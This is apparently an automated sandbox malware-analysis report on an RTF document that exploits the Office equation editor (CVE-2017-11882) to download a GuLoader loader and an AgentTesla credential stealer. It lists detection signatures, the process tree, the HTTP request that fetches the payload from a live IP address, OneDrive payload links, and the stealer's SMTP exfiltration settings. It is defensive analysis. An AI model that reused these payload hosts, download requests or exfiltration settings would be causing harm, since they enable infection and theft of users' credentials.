Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report T81Ip9NCGi

Overview

General Information

Sample Name:T81Ip9NCGi (renamed file extension from none to rtf)
Analysis ID:532227
MD5:79b064007e51e1cfb2f7c91c732242a9
SHA1:c4748fd11683b4b02e5bbc13746005a023f66568
SHA256:b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Yara detected Credential Stealer
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2836 cmdline: "C:\Users\Public\vbc.exe" MD5: 99BDB5995C8DD619A3EC2B799D1CF868)
      • Acly3.exe (PID: 2804 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: E32061DA9B34B82E0AB5D0E53CAF5A09)
        • CasPol.exe (PID: 2524 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
        • CasPol.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
        • CasPol.exe (PID: 672 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
          • misv.exe (PID: 2812 cmdline: "C:\Users\user\AppData\Roaming\misv.exe" MD5: 1DA682EC8DCBC375B6E76660EF46D3FD)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.122.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2836
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2836

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}
            Source: CasPol.exe.672.9.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: T81Ip9NCGi.rtfReversingLabs: Detection: 35%
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: T81Ip9NCGi.rtfAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://192.3.122.180/1100/vbc.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 20%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 20%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\misv.exeJoe Sandbox ML: detected

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,3_2_00406873
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C49
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
            Source: global trafficDNS query: name: onedrive.live.com
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=5A15FDA1AE9
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Dec 2021 19:57:58 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 01 Dec 2021 09:20:35 GMTETag: "2020b-5d2122fb5045c"Accept-Ranges: bytesContent-Length: 131595Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.411004691.000000000040A000.00000008.00020000.sdmp, misv.exe, 0000000C.00000000.670443220.000000000040A000.00000008.00020000.sdmp, vbc.exe.1.dr, vbc[1].exe.1.dr, misv.exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://s.symcd.com06
            Source: WINWORD.EXE, 00000000.00000002.566986051.00000000077FE000.00000004.00000001.sdmpString found in binary or memory: http://scas.openformatrg/drawml/2006/main
            Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
            Source: WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
            Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
            Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0.
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://eruitg.bl.files.1drv.com/
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://eruitg.bl.files.1drv.com/y4muNEzpitWvAmX7Vz4E733dpYGfCYrMWu-PvveEpyz1hNKqOgAXlUDzjcpY7W274Qg
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/
            Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/lU)
            Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/y4mA4TmJkclcR_hxludBD4dX7tD1sUxzesfsAA1g8l7yxjN7FTtZtQscxnySO3fUefx
            Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/y4mP7_EzD4E9pJoVHXNCm_aHG9sNUYaYn5ZLxRh4dzJ2jsCGVhpiD6B5BkejNSybMdS
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6X
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.680070003.0000000000884000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/w
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmpJump to behavior
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive
